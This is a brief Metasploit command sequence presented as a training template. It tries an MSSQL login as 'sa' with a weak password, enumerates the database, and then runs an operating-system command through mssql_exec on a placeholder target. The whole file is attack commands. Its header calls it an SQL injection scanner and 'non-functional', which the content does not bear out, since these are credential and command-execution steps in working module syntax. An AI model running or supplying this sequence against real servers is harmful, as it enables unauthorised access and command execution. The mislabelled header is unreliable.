# SQL Injection Scanner Template
# For Training Use – Non-functional Template

use auxiliary/scanner/mssql/mssql_login
set RHOSTS <TARGET_IP>
set RPORT 1433
set USERNAME sa
set PASSWORD password123
run

use auxiliary/admin/mssql/mssql_enum
set RHOSTS <TARGET_IP>
set RPORT 1433
set USERNAME sa
set PASSWORD password123
run

use auxiliary/admin/mssql/mssql_exec
set RHOSTS <TARGET_IP>
set CMD whoami
run